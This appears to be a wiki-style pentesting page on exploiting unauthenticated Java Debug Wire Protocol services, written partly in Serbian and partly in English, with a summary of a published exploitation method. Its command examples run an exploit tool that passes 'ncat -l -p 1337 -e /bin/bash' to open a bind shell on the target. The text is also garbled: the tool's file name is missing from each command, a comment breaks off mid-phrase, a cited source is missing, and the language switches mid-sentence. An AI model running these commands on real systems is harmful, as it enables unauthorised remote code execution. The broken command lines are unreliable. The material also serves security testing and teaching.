Pentesting JDWP - Java Debug Wire Protocol

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Eksploatacija JDWP-a se oslanja na nedostatak autentifikacije i enkripcije protokola. Obično se nalazi na portu 8000, ali su mogući i drugi portovi. Početna veza se uspostavlja slanjem "JDWP-Handshake" na ciljni port. Ako je JDWP usluga aktivna, odgovara istim stringom, potvrđujući svoju prisutnost. Ova rukovanja deluju kao metoda otiska prsta za identifikaciju JDWP usluga na mreži.

U smislu identifikacije procesa, pretraga za stringom "jdwk" u Java procesima može ukazivati na aktivnu JDWP sesiju.

Osnovni alat je jdwp-shellifier. Možete ga koristiti sa različitim parametrima:

./ -t -p 8000 #Obtain internal data
./ -t -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./ -t -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of

I found that the use of --break-on 'java.lang.String.indexOf' make the exploit more stabilan. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.

More details

This is a summary of Check it for further details.

  1. JDWP Overview:

  • It's a packet-based network binary protocol, primarily synchronous.

  • Lacks authentication and encryption, making it vulnerable when exposed to hostile networks.

  1. JDWP Handshake:

  • A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server).

  1. JDWP Communication:

  • Messages have a simple structure with fields like Length, Id, Flag, and CommandSet.

  • CommandSet values range from 0x40 to 0x80, representing different actions and events.

  1. Exploitation:

  • JDWP allows loading and invoking arbitrary classes and bytecode, posing security risks.

  • The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods.

  1. Real-Life Exploitation:

  • Despite potential firewall protections, JDWP services are discoverable and exploitable in real-world scenarios, as demonstrated by searches on platforms like ShodanHQ and GitHub.

  • The exploit script was tested against various JDK versions and is platform-independent, offering reliable Remote Code Execution (RCE).

  1. Security Implications:

  • The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations.


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